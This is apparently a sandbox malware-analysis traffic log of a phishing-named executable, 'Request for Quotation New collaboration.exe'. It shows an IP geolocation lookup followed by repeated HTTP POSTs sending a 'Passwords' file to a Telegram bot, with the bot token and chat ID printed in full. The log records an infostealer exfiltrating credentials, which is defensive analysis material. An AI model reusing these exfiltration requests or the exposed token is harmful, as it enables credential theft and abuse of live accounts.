                                                                                                                                Data Ascii: Xu&j5)vc]b8RG_Y8X?bzS9>g0qHq:28=LiJ{oK[^aO|.8!QmP@b;&x;Z_SEvsKYQt~\A*ucGT5xDuyz2C+


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.949715172.67.177.1344432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:32:44 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-09 07:32:45 UTC878INHTTP/1.1 200 OK
                                                                                                                                Date: Mon, 09 Dec 2024 07:32:45 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 606988
                                                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BR0BO4UWmbBiWa8BqSP7IcArmB%2BDAf6vIdhF7acO8%2FhNScKpKe2MYZnIw2yjGOaP2rg4Q3GIzWRE5RzVtqIOSem2wdzCN%2ByHJNiVJVAzuxQMoweulnqQ9ZXM3CBmXKRX%2BnWLroeR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ef34d965b460f8b-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1482&rtt_var=575&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1870595&cwnd=237&unsent_bytes=0&cid=8047065f70242dba&ts=449&x=0"
                                                                                                                                2024-12-09 07:32:45 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.949732149.154.167.2204432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:32:52 UTC294OUTPOST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd17f9c670142f
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-09 07:32:52 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 37 66 39 63 36 37 30 31 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd17f9c670142fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-09 07:32:53 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 09 Dec 2024 07:32:53 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 538
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-09 07:32:53 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 34 36 37 39 33 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 37 32 39 35 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":1301,"from":{"id":7234679344,"is_bot":true,"first_name":"vandrozzzx","username":"vandrozzzx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1733729573,"document":{"file_name


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.949739149.154.167.2204432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:32:56 UTC294OUTPOST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd18292170108f
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-09 07:32:56 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 38 32 39 32 31 37 30 31 30 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd18292170108fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-09 07:32:56 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 09 Dec 2024 07:32:56 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 538
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-09 07:32:56 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 34 36 37 39 33 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 37 32 39 35 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":1302,"from":{"id":7234679344,"is_bot":true,"first_name":"vandrozzzx","username":"vandrozzzx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1733729576,"document":{"file_name


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.949750149.154.167.2204432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:32:59 UTC270OUTPOST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd18556e1b4be9
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                2024-12-09 07:32:59 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 38 35 35 36 65 31 62 34 62 65 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd18556e1b4be9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-09 07:33:00 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:00 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 538
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-09 07:33:00 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 34 36 37 39 33 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 37 32 39 35 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":1303,"from":{"id":7234679344,"is_bot":true,"first_name":"vandrozzzx","username":"vandrozzzx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1733729580,"document":{"file_name


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.949758149.154.167.2204432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:33:03 UTC270OUTPOST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd18817804e060
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                2024-12-09 07:33:03 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 38 38 31 37 38 30 34 65 30 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd18817804e060Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-09 07:33:04 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:03 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 538
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-09 07:33:04 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 34 36 37 39 33 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 37 32 39 35 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":1304,"from":{"id":7234679344,"is_bot":true,"first_name":"vandrozzzx","username":"vandrozzzx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1733729583,"document":{"file_name


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.949770149.154.167.2204432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:33:06 UTC270OUTPOST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd18abdf1d4165
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                2024-12-09 07:33:06 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 38 61 62 64 66 31 64 34 31 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd18abdf1d4165Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-09 07:33:07 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:07 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 538
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-09 07:33:07 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 34 36 37 39 33 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 37 32 39 35 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":1305,"from":{"id":7234679344,"is_bot":true,"first_name":"vandrozzzx","username":"vandrozzzx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1733729587,"document":{"file_name


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.949780149.154.167.2204432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:33:10 UTC294OUTPOST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd18d604afe111
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-09 07:33:10 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 38 64 36 30 34 61 66 65 31 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd18d604afe111Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-09 07:33:11 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:11 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 538
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-09 07:33:11 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 34 36 37 39 33 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 37 32 39 35 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":1306,"from":{"id":7234679344,"is_bot":true,"first_name":"vandrozzzx","username":"vandrozzzx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1733729591,"document":{"file_name


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                9192.168.2.949789149.154.167.2204432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:33:14 UTC294OUTPOST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd190142b581dd
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
